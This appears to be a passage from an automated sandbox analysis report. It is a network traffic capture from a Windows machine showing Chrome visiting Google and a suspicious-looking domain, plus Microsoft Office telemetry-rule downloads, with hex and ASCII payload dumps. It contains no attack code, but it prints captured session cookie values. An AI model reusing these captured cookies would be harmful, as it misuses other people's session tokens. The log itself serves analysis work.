2024-11-07 06:33:21 UTC	569	IN	Data Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 31 66 31 66 31 66 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 76 5a 65 30 6a 62 3a 23 61 38 63 37 66 61 3b 2d 2d 6e 77 58 6f 62 62 3a 23 36 33 38 65 64 34 3b 2d 2d 56 75 5a 58 42 64 3a 23 30 30 31 64 33 35 3b 2d 2d 75 4c 7a 33 37 63 3a 23 35 34 35 64 37 65 3b 2d 2d 6a 49 4e 75 36 63 3a 23 30 30 31 64 33 35 3b 2d 2d 54 79 56 59 6c 64 3a 23 30 62 35 37 64 30 3b 2d 2d 5a 45 70 50 6d 64 3a 23 63 33 64 39 66 62 3b 2d 2d 51 57 61 61 61 66 3a 23 36 33 38 65 64 34 3b 2d 2d 44 45 65 53 74 66 3a 23 66 35 66 38 66 66 3b 2d 2d 54 53 57 5a 49 62 3a 23 65 35 65 64 66 66 3b 2d 2d 42 52 4c 77 45 3a 23 64 33 65 33 66 64 3b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23 Data Ascii: :root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#
2024-11-07 06:33:21 UTC	1378	IN	Data Raw: 69 6e 67 3a 30 70 78 7d 2e 77 48 59 6c 54 64 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 79 55 54 4d 6a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 56 44 67 56 69 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 54 55 4f 73 55 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 73 68 6f 77 7b 66 72 6f 6d 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 74 72 61 6e 73 66 6f 72 6d 3a Data Ascii: ing:0px}.wHYlTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:
2024-11-07 06:33:21 UTC	1378	IN	Data Raw: 7d 2e 57 75 30 76 39 62 2c 2e 79 4b 36 6a 71 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 36 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 38 38 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 62 37 37 48 4b 66 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 30 70 78 7d 7d 2e 56 39 4f 31 59 64 20 2e 72 49 78 73 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 20 67 2d 66 6c 61 74 2d 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a Data Ascii: }.Wu0v9b,.yK6jqe{display:inline-block;max-width:568px;min-width:288px;text-align:left}.b77HKf{border-radius:8px}.sHFNYd{margin-left:40px}}.V9O1Yd .rIxsve{display:block;padding:8px 0}.V9O1Yd .sHFNYd{margin-left:0}.V9O1Yd .sHFNYd g-flat-button{padding-left:
2024-11-07 06:33:21 UTC	771	IN	Data Raw: 29 7d 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 33 2e 34 33 35 70 78 3b 77 69 64 74 68 3a 31 33 2e 34 33 35 70 78 7d 2e 49 42 50 5a 75 20 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a Data Ascii: )}.oQcPt{border-bottom:none;border-left:1px solid rgba(0,0,0,.2);border-right:none;border-top:1px solid rgba(0,0,0,.2);box-sizing:border-box;height:13.435px;width:13.435px}.IBPZu .oQcPt{border-bottom:1px solid rgba(0,0,0,.2);border-left:none;border-right:
2024-11-07 06:33:21 UTC	136	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 32 35 30 6d 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 69 6e 73 65 74 3a 30 7d 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 75 67 67 65 73 74 69 6f 6e 5f 67 72 6f 75 70 2e 63 73 73 2e 6d 61 70 20 2a 2f 73 65 6e 74 69 6e 65 6c 7b 7d Data Ascii: ound-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}/# sourceMappingURL=suggestion_group.css.map /sentinel{}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49863	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:21 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 9fe6e772013d3bdb60f2e99378da06c9 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: e4da4b19-701e-0097-0658-2eb8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063321Z-17df447cdb5t94hvhC1DFWw978000000043g00000000cu0h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:21 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: d7a2ab70-d01e-007a-5458-2ef38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063321Z-17df447cdb57srlrhC1DFWwgas0000000450000000003upy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:21 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: ebd57e1f-d01e-005a-2f5c-2e7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063321Z-17df447cdb54ntx4hC1DFW2k40000000041g0000000038yd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:21 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 0ba0e810-201e-0071-785c-2eff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063321Z-17df447cdb5g2j9ghC1DFWev0800000003u0000000009qta x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:21 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: dada5429-501e-007b-0d3f-2e5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063321Z-15869dbbcc6xpvqthC1DFWq7d800000001700000000082bu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:21 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49872	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	1265	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-prefers-color-scheme: light Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
2024-11-07 06:33:22 UTC	1201	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:21 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-nImJ4V4eiWizG5qd11W63A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 06:33:22 UTC	177	IN	Data Raw: 32 63 61 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f Data Ascii: 2cae<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6e 49 6d 4a 34 56 34 65 69 57 69 7a 47 35 71 64 31 31 57 36 33 41 22 3e 77 69 6e 64 6f 77 2e 5f 68 73 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6e 49 6d 4a 34 56 34 65 69 57 Data Ascii: branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="nImJ4V4eiWizG5qd11W63A">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="nImJ4V4eiW
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 5d 7d 72 65 74 75 72 6e 22 2f 22 2b 28 6b 7c 7c 22 67 65 6e 5f 32 30 34 22 29 2b 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 64 29 7d 3b 6d 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 71 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 6b 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 65 3b 63 7c 7c 28 63 3d 74 28 61 2c 62 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e Data Ascii: ]}return"/"+(k\|\|"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+d)};m=google.kEI;google.getEI=p;google.getLEI=q;google.ml=function(){return null};google.log=function(a,b,c,d,k,e){e=e===void 0?l:e;c\|\|(c=t(a,b,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n
